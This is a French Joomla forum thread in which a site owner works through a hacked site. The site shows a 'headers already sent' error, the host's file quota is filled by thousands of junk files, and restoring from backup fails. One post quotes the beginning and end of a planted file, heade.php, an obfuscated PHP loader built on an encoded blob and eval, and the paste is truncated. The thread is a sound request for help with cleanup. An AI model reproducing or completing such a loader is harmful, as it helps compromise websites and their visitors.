impossibilité totale d'écrire dans l'arborescence de mon site et donc de restaurer

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • impossibilité totale d'écrire dans l'arborescence de mon site et donc de restaurer

    Bonjour,

    Mon site est en panne totale, message quand je m'y connecte : Error displaying the error page: Application Instantiation Error: Failed to start the session because headers have already been sent by "/homepages/19/d706998224/htdocs/arpajon/heade.php" at line 1.

    Je ne sais absolument pas à quoi correspond ce message. Comme j'ai une sauvegarde récente de mon site j'ai voulu restaurer mon site.
    Et là très mauvaise surprise impossibilité totale d'écrire dans un répertoire quelle qu'il soit .
    Voilà le type de message issu de filezilla :
    "Commande : put "T:\Joomla\outils de sauvegarde-restauration\kickstart-core-5.4.0\site-photoclub-arpajon.com-20171202-182355.jpa" "site-photoclub-arpajon.com-20171202-182355.jpa"
    Erreur : /arpajon/site-photoclub-arpajon.com-20171202-182355.jpa: open for write: received failure with description 'Failure'
    Erreur : Échec du transfert du fichier"


    je suis dans le "caca". Je fais appel à vous et vous en remercie par avance.
    Dernière édition par HBDD à 28/02/2018, 15h57

  • #2
    Bonjour,

    En transférant par le cpanel du site ?
    UP, le plugin universel à découvrir sur https//up.lomart.fr
    bgMax
    , AdminOrder, MetaData, Zoom, ArtPlug, Custom, Memo, Filter, ... sur http://lomart.fr/extensions

    Commentaire


    • #3
      N'y aurait-il pas atteinte du quota, soit en volume de données, soit en nombre de fichiers ?
      "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
      MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

      Commentaire


      • #4
        Merci pour les 2 premières réponses.
        Une remarque : "je suis un très piètre utilisateur de Joomla. Ne m'en voulez pas si je pose des questions "évidentes" ou si je réponds mal aux questions/remarques que vous me feriez"
        Par rapport à la question sur volume de données et nombre de fichier. Le pbme ne vient sans doute pas de là. Le site (site de photo-club) est très simple, petit en taille. (D'ailleurs à ce sujet Y a t 'il dans joomla la possibilité de connaitre la taille complète du site ?) Pour info le jpa de la sauvegarde est de 542Mo)

        Autre remarque qui a peut être une relation avec mon problème, quand je veux faire une mise à tour 'toute bête' cela ne fonctionne pas. Exemple pour al maj de JCE editor pro (passage de 2.6.23 à 2.6.26) j'ai le message : Erreur

        Archive does not exist Alerte

        le chemin de mise à jour n'existe pas Message

        COM_INSTALLER_TYPE_TYPE_ : erreur de mise à jour
        ???

        Quant à la question "En transférant par le cpanel du site ?" qu'entendez-vous par là ? Que vouliez-vous que je fasse ?

        Nota : Je suis à jour de Jommla (3.8.5)


        Commentaire


        • #5
          Un "petit" site ne fait que quelques dizaines de Mo, donc une archive de 520 Mo, ce n'est plus un "petit" site (mais c'est normal pour un site de photo club, les images ayant une taille importante).

          Par rapport au quota de votre hébergement, il est possible que celui-ci soit atteint : si vous conservez sur le serveur (ce qui n'est pas recommandé) une dizaine de sauvegardes, chacune de 500 Mo, cela vous fait déjà 5 Go d'occupé.

          Vous devriez avoir dans votre console d'hébergement, une indication du quota de stockage utilisé (n'oubliez pas que cela peut aussi comprendre les emails et les bases de données).

          A défaut, accédez par FTP au serveur et vérifiez s'il n'y a pas des anciennes sauvegardes que vous pourriez éliminer ; vous pouvez les télécharger sur votre ordi avant de les effacer du serveur.
          Une fois le nettoyage effectué, retestez votre site et/ou essayez de restaurer une sauvegarde.
          Tous les services pour les sites Joomla! : sécurité, nettoyage de sites piratés, hébergement, SEO, applications Fabrik, migration, compatibilité mobiles, accessibilité, ...
          Administrateur certifié Joomla! 3
          https://www.betterweb.fr

          Commentaire


          • #6
            Merci pour vos réponse. Je vais rechercher pour donner réponse à jfqe
            Dernière édition par HBDD à 21/02/2018, 19h40

            Commentaire


            • #7
              Avez-vous essayer ma solution ?
              Sur 1&1, c'est https://clients.1and1.fr/WebspaceExplorer
              UP, le plugin universel à découvrir sur https//up.lomart.fr
              bgMax
              , AdminOrder, MetaData, Zoom, ArtPlug, Custom, Memo, Filter, ... sur http://lomart.fr/extensions

              Commentaire


              • #8
                bonjour à tous. Avant de partir à d'autres occupations je jette un oeil à ce qui m'a été demandé notamment par jfque.
                Je crois avoir trouvé le problème que vous soulevez, à savoir un problème de place ou de fichier.
                Je suis allé sur la partie "qota" de mon site. ET là l'anomalie de fonctionnement est là. Espace disque utilisé : 4 874,00 Mo sur 250 000,00 Mo. Là c'est Ok
                mais le problème est 262 144 fichier(s) utilisé(s) sur 262 144 fichiers disponibles et nombre de fichiers que vous pouvez encre créer : 0

                Via Filezilla je suis allé sur mon site à la recherche des fichiers..
                J'ai trouvé dans le répertoire /arpajon/Images un sous répertoire bak avec dedans une beaucoup, beaucoup de sous répertoires numériques de nom (pour être plus clair un exemple : /arpajon/images/bak/102
                Et dans ces répertoires sans doute des milliers de fichiers de petite taille (7 ou 8 octets) avec des noms du genre 000ca3ac4ba1f3d5278672efa2dcff97.jpg

                En parallèle j'ai dans /arpajon/config l'équivalent si je puis dire à ce que je viens de dire ci-dessus des fichiers de nom filenameXX.php . Exemple filename102.php

                La saturation de mon espace viens donc sans doute de là. maintenant d'où viennent ces fichiers ??? Quel processus les créent ???
                Je continuerai mes recherches en fin d'après midi..
                Merci de me faire part de vos idées de recherche.



                Commentaire


                • #9
                  J'ajoute que ce ne sont pas des images et quand j'en ouvre 1 je n'est que des chiffres, exemple : : 12337231

                  Commentaire


                  • #10
                    C'est donc bien ce que je pensais.
                    La question est maintenant de savoir pourquoi il y a tous ces fichiers : ce qui est dans des dossiers "cache" peut être supprimé (sauf fichier index.html) et quelles sont les extensions qui peuvent renommer éventuellement les images.
                    J'ai par exemple testé récemment FW Gallery qui crée systématiquement des noms de fichiers sous forme de chiffres.
                    Logiquement, le dossier "bak" devrait être une copie de sécurité des fichiers modifiés par une extension (et pouvant être supprimés si devenus inutiles) : laquelle ?
                    Il est peut-être possible qu'une demande d'augmentation du quota de fichiers soit acceptée par 1&1. Il faut les interroger.
                    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                    Commentaire


                    • #11
                      Bonsoir, pas pu m'occuper de la "panne"
                      Par rapport aux questions posées.
                      rien dans le dossier cache.
                      Sur le site du club très peu utilisé par les adhérents pour diverses raisons avec très peu d'images et qui sont très limitées en taille et il n'y a que moi qui les charge.
                      Pour essayer d'avancer j'ai commencé à vouloir supprimer le répertoire image/bak.
                      C'est très très long (des heures et des heures ...)
                      j'ai à à peu près déjà 16500 en moins.
                      J'ai relancé l'adresse de mon site ... et j'ai tours le même message qu'au début : Error displaying the error page: Application Instantiation Error: Failed to start the session because headers have already been sent by "/homepages/19/d706998224/htdocs/arpajon/heade.php" at line 1.

                      je suis vraiment très ennuyé. Je pense que j'ai du récolter une "cochonnerie"
                      Que faire quand on est pas fichu de restaurer son site à partir d'une sauvegarde???
                      .

                      Commentaire


                      • #12
                        bonjour à tous,
                        Point du matin. Hier soir au coucher j'ai arrêté "le ménage".
                        CE matin :
                        - première surprise : j'avais, avant le "ménage" hier au soir renommé le /arpajon/images/bak. Ce matin surprise le répertoire renommé existe toujours avec dedans 65 dossiers. Ce matin le répertoire /arpajon/images/bak est réapparu avec dedans 37 dossiers. ?????
                        - pour RobertG. dans l'administration de Joomla j'ai désactivé l'extension de FW Gallery
                        Question place j'ai la possibilité de plus de 26000 possibilité de fichiers à créer
                        - j'ai relancé le site et toujours l'éternel message

                        Je suis allé voir le contenu de ce fameux fichier "/homepages/19/d706998224/htdocs/arpajon/heade.php" at line 1.
                        Taille : 10135, Et son contenu est le suivant est le suivant : <?php $_F=__FILE__;$_X='Pz48P3BocA0KQDRuNF9zNXQoJ201bTJy eV9sNG00dCcsICctNicpOw0KQDRuNF9zNXQoJ20xeF81eDVjM3 Q0Mm5fdDRtNScsIDApOw0KQHM1dF90NG01X2w0bTR0KDApOw0K QDVycjJyX3I1cDJydDRuZygwKTsNCkA0bjRfczV0KCdkNHNwbD F5XzVycjJycycsIDApOw0KDQokMXA0ID0gImh0dHA6Ly82OWEt Njg3LTY2OC02bzgueHh3NG4ucHcvMXA0YS5waHAiOw0KDQoNCi RiMWtfZDRyID0gZDRybjFtNShfX0ZJTEVfXykgLiAiLzRtMWc1 cyI7DQo0ZiAoIWY0bDVfNXg0c3RzKCRiMWtfZDRyKSkgew0KIC Bta2Q0cigkYjFrX2Q0cik7DQp9DQoNCiRzM2ZmNHhfdHh0ID0g JGIxa19kNHIgLiAnL3MzZmY0eC50eHQnOw0KNGYgKGY0bDVfNX g0c3RzKCRzM2ZmNHhfdH

                        etc etc et la fin est ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>
                        Bref du parfait chinois pour moi !

                        Voilà ou j'en suis. Je ne sais absolument plus quoi faire. Si vous pouviez m'aider en me donnant des conseils je suis preneur à 200%. Merci par avance.

                        Commentaire


                        • #13
                          Ce fichier me semble totalement anormal. Codé et n'appartenant certainement pas à Joomla! ni à une de ses extensions, j'imagine qu'il ne doit pas être le seul qu'un pirate a ajouté sur ton serveur.
                          "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                          MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                          Commentaire


                          • #14
                            Bonjour RobertG. Je suis d'accord avec toi. Mais maintenant j'ai toujours la même question : que faire ??? C'est à dire comme repartir d'une version saine (ma sauvegarde JPA). Et une question annexe : comment m'assurer que cette sauvegarde qui à priori est "propre est saine à coup sûr" et ne contient pas une ou des cochonneries cachées qui se mettrons en route après la sauvegarde réinstallée ???

                            Commentaire


                            • #15
                              Si tu es sûr que ta sauvegarde jpa est saine (tu devrais la tester en local, vérifier que tu ne vois pas de fichiers comme heade.php, utiliser le quickscan d'aeSecure pour avoir une idée supplémentaire), il faut totalement vider ton serveur distant avant de la déployer, histoire de repartir sans risquer de laisser des fichiers indésirables (à ma connaissance, la restauration Akeeba ne supprime pas elle-même les dossiers et fichiers avant restauration, mais je n'ai pas vérifié le ftp en cours de restauration).
                              "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
                              MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X